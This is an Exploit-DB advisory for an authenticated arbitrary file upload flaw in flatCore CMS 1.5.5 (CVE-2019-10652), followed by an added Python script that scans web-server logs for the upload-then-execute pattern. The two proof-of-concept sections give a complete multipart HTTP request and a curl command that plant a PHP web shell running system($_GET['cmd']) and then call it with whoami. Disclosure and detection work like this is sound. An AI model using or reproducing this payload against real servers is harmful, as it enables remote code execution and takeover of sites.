[webapps] flatCore 1.5.5 - Arbitrary File Upload
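This vulnerability allows an attacker to upload arbitrary PHP files through the flatCore CMS admin panel and execute malicious code on the server. The attacker must log in to an administrator account and use a CSRF token to bypass restrictions, uploading a backdoor file into a specific directory to achieve remote code execution.
2025-4-10 00:0:0 Author: www.exploit-db.com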

# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS] 
# Software Link: [https://github.com/flatCore/flatCore-CMS]
# Version: [1.5.5] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2019-10652]
PoC:
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:

POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream

<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"

../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"

<valid_csrf_token>
-----------------------------735323031399963166993862150--
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami

PoC 
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability

# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.

# Step 2: Upload a malicious PHP file using the file upload feature

# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php

# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@shell.php" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"

# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID

# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"

This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]
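
Detection sketch for the pattern both PoCs rely on (a POST to /acp/core/files.upload-script.php followed by a request for a script under /content/files/). This is an added example, not part of the original advisory or of flatCore; the combined access-log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths taken from the PoC above; the Apache/nginx "combined" log format is an assumption.
UPLOAD_ENDPOINT = "/acp/core/files.upload-script.php"
UPLOAD_DIR = "/content/files/"
# Extensions commonly mapped to the PHP handler (assumed; match this to the server's config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_execution(lines):
    """Return (client_ip, path, had_query, uploader_seen) for every request
    to a script file under the upload directory. uploader_seen is True when
    the same client earlier made a successful POST to the upload endpoint."""
    uploaders = set()
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        path = unquote(url.path)  # decode %xx so encoded extensions still match
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT and m["status"].startswith("2"):
            uploaders.add(m["ip"])
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            findings.append((m["ip"], path, bool(url.query), m["ip"] in uploaders))
    return findings

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Oct/2024:10:00:01 +0000] "POST /acp/core/files.upload-script.php HTTP/1.1" 200 12 "-" "curl/8.5.0"',
    '203.0.113.7 - - [26/Oct/2024:10:00:05 +0000] "GET /content/files/exploit.php?cmd=whoami HTTP/1.1" 200 40 "-" "curl/8.5.0"',
    '198.51.100.9 - - [26/Oct/2024:10:01:00 +0000] "GET /content/files/report.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [26/Oct/2024:10:02:00 +0000] "GET /content/files/SHELL.PHP HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, had_query, uploader in find_upload_execution(SAMPLE_LOG):
        print(f"{ip} requested {path} (query={had_query}, uploaded_earlier={uploader})")
```

Any hit is worth reviewing, since an upload directory should only serve static files; a hit with uploaded_earlier set is the upload-then-execute sequence the PoC describes.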
            

Source: https://www.exploit-db.com/exploits/52165